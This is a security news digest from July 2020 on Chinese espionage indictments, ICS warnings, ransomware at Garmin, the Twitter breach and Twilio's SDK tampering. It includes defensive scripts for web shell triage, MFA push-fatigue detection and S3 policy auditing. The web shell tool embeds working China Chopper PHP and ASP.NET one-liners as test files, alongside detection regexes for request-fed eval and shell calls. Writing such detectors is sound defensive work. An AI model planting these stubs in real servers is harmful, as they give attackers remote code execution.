Srsly Risky Biz: Tuesday, July 28

Chinese campaign a sad indictment of infosec, NSA warns of imminent ICS attacks, Apple throttles iOS research

Your weekly dose of Seriously Risky Business news is supported by the Cyber Initiative at the Hewlett Foundation.

MSS-linked hackers’ 101 tradecraft a winning formula

US authorities have unsealed the indictment of two prolific state-sponsored Chinese hackers accused of a ten-year espionage and cybercrime spree that pilfered data from dozens of organisations across the globe.

The indictment details how Li Xiaoyu and Dong Jiazhi were routinely tasked by Guangdong State Security Department (part of China's Ministry of State Security) with the theft of secrets of national significance. Li and Dong were essentially independent contractors who also dabbled in cybercrime as a side-hustle.

Known victims included defence contractors, medical researchers, political dissidents, software companies and even religious clergy. Targets were located in 11 countries, including Australia, the United Kingdom, the United States and several in Europe.

What is striking about the indictment is how little innovation was required to compromise targets. Li and Dong exploited known vulnerabilities in internet-facing servers, installed web shells (China Chopper), brought other open source tools into target environments for command execution and credential dumping, and packed the stolen data into RAR archives for exfiltration.

When they did need sophisticated tooling, they didn't roll their own. Investigators established that on at least one occasion the indicted duo had to ask their handlers at China's Ministry of State Security for a zero-day exploit to help them complete a mission.

Many of the victims appear to be the sort of large organisations that should have the capability and tooling required to prevent simple attacks. What does it say when a team of two was able to freely bypass preventative controls at well-funded organisations so often, seldom requiring the use of 0day or custom malware? It's worth revisiting the ASD and NSA guide [pdf] to detecting web shells published in April 2020, which in hindsight might have deserved more than 34 words in Seriously Risky Business.
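The web shell detection the ASD/NSA guide describes boils down to two questions: which script files on the web root hand request data straight to an interpreter, and which script paths are receiving POST traffic the application doesn't account for. The script below, added here as an illustration and not code from the indictment, the ASD/NSA guide or any victim, runs both checks over a constructed web root and a constructed Apache-style access log and reports the files flagged by both. The file contents, log lines, IP addresses and the "known endpoints" manifest are all made up; the two flagged stubs are the well-known China Chopper server-side one-liners for PHP and ASP.NET. The same approach applies to the compromised sites hosting Emotet payloads described later in this issue.

```python
"""Web shell triage: content signatures plus access-log correlation.

Added example, not code from the indictment or the ASD/NSA guide. Every file,
log line and address below is constructed for illustration.
"""
import re
import tempfile
from collections import Counter
from pathlib import Path

# Constructed web root. uploads/image.php and help/help.aspx are the classic
# China Chopper server-side stubs (PHP and ASP.NET JScript flavours).
SAMPLE_FILES = {
    "index.php": "<?php\nrequire 'app/bootstrap.php';\n",
    "lib/util.php": "<?php\nfunction slugify($s) { return strtolower($s); }\n",
    "uploads/image.php": "<?php @eval($_POST['pass']); ?>",
    "help/help.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
}

# Constructed Apache combined-format access log: one attacker IP POSTing to the
# dropped files, one legitimate user hitting deployed endpoints.
SAMPLE_LOG = """\
203.0.113.9 - - [21/Jul/2020:03:14:07 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Jul/2020:03:15:01 +0000] "POST /uploads/image.php HTTP/1.1" 200 112 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
198.51.100.7 - - [21/Jul/2020:03:15:09 +0000] "POST /uploads/image.php HTTP/1.1" 200 2048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
203.0.113.9 - - [21/Jul/2020:03:16:22 +0000] "POST /index.php HTTP/1.1" 302 0 "https://example.test/login" "Mozilla/5.0"
198.51.100.7 - - [21/Jul/2020:03:17:40 +0000] "POST /help/help.aspx HTTP/1.1" 200 640 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
"""

# Script paths the application is known to serve (assumed deployment manifest).
KNOWN_ENDPOINTS = {"/index.php", "/lib/util.php"}
SCRIPT_EXT = {".php", ".phtml", ".asp", ".aspx", ".ashx", ".jsp", ".jspx"}

# Content signatures: request data passed straight to eval() or a shell.
SIGNATURES = [
    ("php_eval_request", re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("php_exec_request", re.compile(r"\b(system|shell_exec|passthru|exec)\s*\(\s*\$_(POST|GET|REQUEST)", re.I)),
    ("jscript_eval_request", re.compile(r"eval\s*\(\s*Request(\.Item)?\s*[\[(]", re.I)),
    ("php_eval_base64", re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)),
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def scan_tree(root: Path) -> dict:
    """Map web-relative path -> matched signature names, for script files only."""
    hits = {}
    for f in root.rglob("*"):
        if not f.is_file() or f.suffix.lower() not in SCRIPT_EXT:
            continue
        names = [name for name, rx in SIGNATURES if rx.search(f.read_text(errors="ignore"))]
        if names:
            hits["/" + f.relative_to(root).as_posix()] = names
    return hits


def suspect_posts(log_text: str, known: set) -> Counter:
    """Count (ip, path) for POSTs to script files that are not in the manifest."""
    counts = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        if m["method"] == "POST" and Path(path).suffix.lower() in SCRIPT_EXT and path not in known:
            counts[(m["ip"], path)] += 1
    return counts


def triage(root: Path, log_text: str, known: set) -> list:
    """Paths flagged by both checks: shell-like content AND unexplained POST traffic."""
    content = scan_tree(root)
    posted = {path for _, path in suspect_posts(log_text, known)}
    return sorted(p for p in content if p in posted)


def build_sample_root() -> Path:
    """Write SAMPLE_FILES into a temporary directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    for rel, body in SAMPLE_FILES.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
    return root


if __name__ == "__main__":
    root = build_sample_root()
    print("content hits:", scan_tree(root))
    print("suspect POSTs:", suspect_posts(SAMPLE_LOG, KNOWN_ENDPOINTS))
    print("triage:", triage(root, SAMPLE_LOG, KNOWN_ENDPOINTS))
```

Either check on its own is noisy: plenty of legitimate code evals things, and plenty of legitimate endpoints are missing from a manifest. Requiring both, and adding file creation time against the last deployment, is what keeps the list short enough for a human to read. Obfuscated shells that decode their payload before eval will slip past the signatures, which is why the log side matters.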

It's also reasonable to ask whether in the absence of custom malware, threat intelligence providers incorrectly clustered the duo's activities with other, better known groups.

Given the amount of information law enforcement had on these guys, the remaining question is what signal the United States was sending when choosing this specific time to go public: the same week authorities ordered a Chinese consulate in Houston to close down.

If the media conference announcing the indictments was anything to go by, China wasn't the only audience US authorities had in mind.

"China is facing degradation of its image on the world stage," warned US Assistant Attorney General Jon Demers. "Other nations partnering with China in economic development projects should closely consider their alliances with a country that has so little regard for international law."

NSA warns of attacks targeting industrial control systems

The NSA and CISA have warned operators of industrial control systems to prepare for an escalation in "malicious cyber activity" against internet-accessible operational technology (OT).

Operators of industrial control systems need to be mindful of "heightened tensions" and adversaries "seeking to retaliate for perceived US aggression", the advisory said.

The advisory wasn't specific about which of the many US foreign policy challenges was causing issues.

Iran is likely to feel particularly aggrieved about a pattern of mysterious explosions in recent weeks at facilities that are obvious targets for state-sponsored sabotage. But who knows? It's just as likely that Iran's infrastructure is going boom as a consequence of sanctions that are gradually strangling its ability to maintain critical systems. It's fun to imagine the whole thing is an Israeli op, and it very well might be. Revelations that the CIA was granted broad authority to conduct covert cyber operations throw another pinch of confusion into the mix. There's plenty of room for miscalculation.

The NSA/CISA advisory recommends critical infrastructure operators reduce the exposure of OT networks to the internet by isolating administrative access and segmenting networks. It also recommends operators map out their OT assets and subject them to continuous vulnerability monitoring.

Separately, CISA notified operators of vulnerabilities in Schneider Electric's safety systems. These are the systems programmed to shut machinery down safely when a dangerous condition is detected in the operating environment. One of the bugs, a debug port left open on Tricon CX controllers (CVE-2020-7491), is remotely exploitable and carries a CVSS base score of 10.0. Yikes.

Apple’s Security Research Devices land, with a catch

Apple has launched its Security Research Device (SRD) access program. The SRD is a modified iPhone designed for security researchers to tinker with, first announced at Black Hat in August 2019.

Apple will make SRDs available to researchers of its choosing on 12-month loans (the devices remain Apple's property), and only to individuals in 23 eligible countries. Any vulnerabilities discovered using the device are bound by Apple's disclosure terms.

Some of the world's top iOS security researchers rejected the program from the outset. There are already tools available in the market, such as Corellium, which can be used to emulate iOS software for testing purposes, and the resulting vulnerability information (and exploits) can be disclosed, reported or sold as the researcher sees fit.

Google's Project Zero team won't apply for SRDs. As a matter of policy Project Zero publishes bug details 90 days after reporting them to the affected vendor. Apple demands that participants in the SRD program keep their findings confidential until a date of Apple's choosing.

The SRD program should be viewed in the context of Apple's unresolved lawsuit against Corellium. Apple argues [pdf] that Corellium's software, a tool for virtualising iOS hardware, is "profiting from blatant copyright infringement." It has sought a permanent injunction against further sale of Corellium licenses and an order to "impound and destroy all infringing materials."

In its defence, Corellium argues [pdf] that its products could not infringe copyright as the products do not run any Apple code. Further, use of the software is 'transformative' in the sense that it works to a new purpose (vulnerability research) that Apple doesn’t provide, subjecting it to protection under fair use doctrine. Apple's counterargument is that the question of whether individual researchers should be protected by "fair use" when using Corellium software is irrelevant to whether the act of selling access to the testing software infringes copyright.

Apple’s litigation has reportedly had an adverse impact on Corellium sales.

Garmin resuming operations after ransomware attack

Digital wearables vendor Garmin is recovering from a ransomware attack that crippled most of its mapping and tracking services.

Garmin shut down most of its operations on July 23 to respond to the attack. The last of its consumer-facing services came back online earlier today (July 27).

Sources told ZDNet, TechCrunch and Bleeping Computer that the company was infected with WastedLocker malware recently attributed to Russian organised crime group, Evil Corp. Sergiu Gatlan at Bleeping Computer reports that a file encrypted with WastedLocker and addressed to Garmin was uploaded to VirusTotal by a user in Taiwan on July 22.

The attackers reportedly sought US$10 million in ransom payments from Garmin. The company hasn't disclosed whether it paid up. That's a sensitive issue: Evil Corp and several of its crew have been sanctioned by US authorities. Transferring them money, even under duress, is seriously risky business.

Ransomware operators also disrupted the Australian arm of Nielsen this week, delaying its feed of TV ratings by six days and counting. Schools, universities, hospitals and medical research centres are one thing... but television ratings agencies? Is nothing sacred?

Twitter attackers accessed direct messages

Attackers read the direct message inbox of 36 of the 45 Twitter accounts taken over in this month's security incident, and downloaded the full account archive ("Your Twitter Data") for eight of them, the company has revealed.

Twitter is yet to confirm the New York Times' report that attackers obtained the credentials needed to reach its administrative tools by first getting into the company's Slack workspace. Former employees told Reuters that more than 1,000 Twitter staff have access to the administrative tool from which the email address associated with an account can be changed.

Twitter's final report, if made public, will make for a good study in user training. Twitter has divulged that attackers "successfully manipulated a small number of employees and used their credentials to access Twitter’s internal systems, including getting through our two-factor protections."

In some two-factor implementations, users get little context about what action triggered an authentication challenge, or become fatigued by the number of challenges they receive and approve them reflexively. That creates perfect conditions for an attacker with a knack for social engineering: keep the prompts coming, or talk the target through approving one.
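The pattern described above leaves a trace in the MFA provider's logs: a run of denied or expired push prompts for one user, followed by an approval, or simply more prompts in a few minutes than any human would generate. The detector below is an added example, not Twitter's telemetry or detection logic. The JSON log lines are constructed, and the event names (push_sent, push_denied, push_timeout, push_approved) are assumed names for a generic push-MFA product; map them to whatever your provider actually emits.

```python
"""Flag MFA push-fatigue patterns in authentication logs.

Added example, not Twitter's telemetry. Log lines are constructed and the
event names are assumed for a generic push-MFA provider.
"""
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
REJECTIONS_BEFORE_APPROVAL = 2  # an approval after this many denials/timeouts is suspicious
PROMPTS_PER_WINDOW = 5          # this many prompts in one window is bombing, approved or not

# Constructed log: alice ignores/denies three prompts then approves the fourth;
# bob approves a single prompt, which is normal.
SAMPLE_LOG = """\
{"ts": "2020-07-15T20:01:02Z", "user": "alice", "event": "push_sent", "ip": "198.51.100.7"}
{"ts": "2020-07-15T20:01:40Z", "user": "alice", "event": "push_timeout", "ip": "198.51.100.7"}
{"ts": "2020-07-15T20:02:05Z", "user": "alice", "event": "push_sent", "ip": "198.51.100.7"}
{"ts": "2020-07-15T20:02:20Z", "user": "alice", "event": "push_denied", "ip": "198.51.100.7"}
{"ts": "2020-07-15T20:03:11Z", "user": "alice", "event": "push_sent", "ip": "198.51.100.7"}
{"ts": "2020-07-15T20:03:50Z", "user": "alice", "event": "push_timeout", "ip": "198.51.100.7"}
{"ts": "2020-07-15T20:04:30Z", "user": "alice", "event": "push_sent", "ip": "198.51.100.7"}
{"ts": "2020-07-15T20:04:41Z", "user": "alice", "event": "push_approved", "ip": "198.51.100.7"}
{"ts": "2020-07-15T20:05:00Z", "user": "bob", "event": "push_sent", "ip": "203.0.113.9"}
{"ts": "2020-07-15T20:05:06Z", "user": "bob", "event": "push_approved", "ip": "203.0.113.9"}
"""


def parse(log_text):
    """Yield events in log order with ts converted to datetime."""
    for line in log_text.splitlines():
        rec = json.loads(line)
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
        yield rec


def detect_push_fatigue(log_text):
    """Return alerts for approvals preceded by repeated rejections, and for prompt floods."""
    recent = defaultdict(deque)  # user -> events inside the sliding WINDOW
    alerts = []
    for rec in parse(log_text):
        q = recent[rec["user"]]
        q.append(rec)
        while rec["ts"] - q[0]["ts"] > WINDOW:  # drop events older than the window
            q.popleft()
        sent = sum(e["event"] == "push_sent" for e in q)
        rejected = sum(e["event"] in ("push_denied", "push_timeout") for e in q)
        if rec["event"] == "push_approved" and rejected >= REJECTIONS_BEFORE_APPROVAL:
            alerts.append({"rule": "approval_after_rejections", "user": rec["user"],
                           "ip": rec["ip"], "rejected": rejected, "ts": rec["ts"].isoformat()})
        if rec["event"] == "push_sent" and sent >= PROMPTS_PER_WINDOW:
            alerts.append({"rule": "prompt_flood", "user": rec["user"],
                           "ip": rec["ip"], "prompts": sent, "ts": rec["ts"].isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_push_fatigue(SAMPLE_LOG):
        print(alert)
```

The first rule is the one worth paging on: the approval is the moment the attacker gets in, so the alert should trigger a session review rather than just a ticket. The thresholds are starting points; tune them against a week of your own logs before trusting them.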

[SPONSORED ITEM] Relief for patch pain

If there's one issue 100% of IT shops struggle with, it's getting consistent, timely patching across all of your endpoints.

Our newsletter sponsor Automox obsesses over making patch management easier. This refreshed technical guide [pdf] tells you exactly how it's done: with lightweight agents on every endpoint (Windows, Mac, Linux) that can be administered from an AWS-hosted management panel. That document is a rare thing in infosec -- it actually tells you what the product is and how it works.

Updates can automatically be fetched from the Automox cloud or your own local server according to simple policies, or you can write custom rules for each OS and application. It comes with all the reporting you'd expect out of the box, plus there is an API for third-party reporting tools.

Take a look and drop us a line with any feedback.

Cisco devices are getting owned

Another remotely exploitable bug in Cisco kit (CVE-2020-3452), a read-only path traversal in the web services interface, has been published since our last newsletter, and it's already being exploited in the wild.

The vulnerability affects Cisco's Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. A PoC was published July 23 and every man and his dog have written Google and Shodan dorks to search for vulnerable devices ever since.

It's yet another security issue discovered by Mikhail "blood in the water" Klyuchnikov at Positive Technologies, the same Mikhail who dropped the oft-exploited bugs in Citrix NetScaler and F5 BIG-IP network devices. CISA warns that unpatched F5 boxes were still under attack as this newsletter hit your inbox.

Fancy Bear snooping on US energy networks

Several US-based organisations were targets of APT28 (Fancy Bear) attacks between December 2018 and May 2020, according to an FBI advisory seen by Andy Greenberg at Wired. At least one victim was a "US energy entity".

Blackbaud clients demand answers after ransomware attack

Software company Blackbaud paid a ransomware gang not to release client data stolen in a May 2020 attack. The attackers copied data off Blackbaud's network before the company's blue team detected the intrusion and thwarted attempts to encrypt data on affected devices. Blackbaud clients, many of them universities, are now upset that it took until July 16 to learn their data had been exfiltrated.

Twitter throttles QAnon harassment campaigns

Twitter removed 7000 accounts and will no longer promote content from 150,000 others to crack down on coordinated harassment campaigns by followers of QAnon conspiracy theories. TikTok followed suit, removing QAnon hashtags. The QAnon movement has now been denied its home at 8chan (shut down), its dedicated communities at Reddit and Facebook (moderated) and amplification on Twitter and TikTok (throttled).

Twilio's SDK compromised in malvertising scam

Messaging software company Twilio was humbled by attackers who modified its TaskRouter JavaScript SDK as part of a malvertising campaign. Twilio only learned of the compromise through a tip-off, and its investigation found that the SDK was served from an Amazon S3 bucket whose access controls let anyone on the internet both read and write to it. Thankfully the doctored SDK was only live for eight hours.
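A bucket that serves a public SDK needs anonymous read; it never needs anonymous write, and the two are easy to confuse in a policy or an ACL. The audit below is an added example, not Twilio's tooling or anything from its post-mortem. The weak and fixed bucket policies, the ACL, the bucket name, the account ID and the release-role name are all constructed, and no AWS call is made: in practice you would feed these functions the JSON returned by get_bucket_policy and get_bucket_acl.

```python
"""Audit S3 bucket policy and ACL documents for anonymous write access.

Added example, not Twilio's tooling. Policies, ACLs, bucket name, account id
and role name are constructed; nothing here talks to AWS.
"""
from fnmatch import fnmatchcase

# Actions that let a caller replace or remove objects, i.e. tamper with an SDK.
WRITE_ACTIONS = ("s3:PutObject", "s3:PutObjectAcl", "s3:DeleteObject", "s3:PutBucketPolicy")
# ACL permissions that allow object writes or ACL changes.
WRITE_PERMISSIONS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",  # any AWS account, not just yours
}

# Weak: public read is fine for a CDN bucket, but PutObject is granted to everyone.
WEAK_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": ["s3:GetObject", "s3:PutObject"],
     "Resource": "arn:aws:s3:::example-sdk-cdn/*"},
]}

# Fixed: anonymous callers get GetObject only; writes go to one release role.
FIXED_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::example-sdk-cdn/*"},
    {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:role/sdk-release-pipeline"},
     "Action": ["s3:PutObject", "s3:PutObjectAcl"], "Resource": "arn:aws:s3:::example-sdk-cdn/*"},
]}

# Weak ACL: the AllUsers group holds WRITE on the bucket, the classic misconfiguration.
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
WEAK_ACL = {"Grants": [
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "WRITE"},
]}
FIXED_ACL = {"Grants": [{"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"}]}


def _as_list(v):
    return v if isinstance(v, list) else [v]


def principal_is_anonymous(principal) -> bool:
    """True for Principal "*" or {"AWS": "*"}: any caller, signed or not."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def actions_allow_write(actions) -> bool:
    """IAM action matching is case-insensitive and supports * wildcards (s3:*, s3:Put*)."""
    return any(fnmatchcase(w.lower(), pattern.lower())
               for pattern in _as_list(actions) for w in WRITE_ACTIONS)


def policy_public_writes(policy: dict) -> list:
    """Indices of Allow statements granting a write action to anonymous principals.

    Conditions are deliberately ignored: a public write that only works behind a
    Condition still deserves a human look, so we flag rather than excuse it.
    """
    flagged = []
    for i, st in enumerate(_as_list(policy.get("Statement", []))):
        if st.get("Effect") == "Allow" and principal_is_anonymous(st.get("Principal")) \
                and actions_allow_write(st.get("Action", [])):
            flagged.append(i)
    return flagged


def acl_public_writes(acl: dict) -> list:
    """'Group:Permission' strings for public-group grants that allow writes."""
    out = []
    for g in acl.get("Grants", []):
        grantee = g.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS \
                and g.get("Permission") in WRITE_PERMISSIONS:
            out.append(grantee["URI"].rsplit("/", 1)[1] + ":" + g["Permission"])
    return out


if __name__ == "__main__":
    print("weak policy:", policy_public_writes(WEAK_POLICY))    # [0]
    print("fixed policy:", policy_public_writes(FIXED_POLICY))  # []
    print("weak acl:", acl_public_writes(WEAK_ACL))             # ['AllUsers:WRITE']
    print("fixed acl:", acl_public_writes(FIXED_ACL))           # []
```

Both the policy and the ACL have to be checked, because either one alone can grant the write. The cheaper fix is structural: turn on S3 Block Public Access at the account level so that neither document can make a bucket publicly writable, and front the one bucket that genuinely needs public read with a distribution rather than exposing the bucket itself.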

FBI investigates GoldenSpy infections

The FBI has warned defenders of US networks about the GoldenSpy/GoldenHelper campaigns covered in Seriously Risky Biz over the last few weeks. The FBI recently investigated an infection at a US pharmaceutical company after it installed tax software mandated by Chinese authorities. This snowball has some steep downhill slope in front of it now.

Bounty out for SEC hackers

The US Department of State will pay a US$1 million bounty for information that leads to the arrest of either of the two Ukrainians accused of hacking the SEC's EDGAR system in 2016. Artem Radchenko and Oleksandr Ieremenko were blamed for the campaign in a January 2019 indictment, and remain at large. In Ukrainian terms, a tip-off could be worth 27,801,664 hryvnia. That's enough to buy five luxury Kiev apartments: one for the informant and one for each of their new bodyguards.

This meme saved the internet today

In case you missed it last week, the Emotet botnet is back in a big way. But it could have been bigger. An unidentified hero discovered that Emotet payloads were hosted on compromised websites, each controlled by web shells protected with weak passwords. Our hero has been methodically hacking into these web sites to replace the payload with memes. Analysts estimate this funny business rendered a quarter of Emotet infections fruitless and cost Ivan (the purported name of the botnet's admin) at least one day of lost productivity.


The email version of this newsletter erroneously reported that the US ordered two Chinese consulates to close down. Only one consulate in Houston was subject to this order. The same story misspelled ‘Guangdong’ province.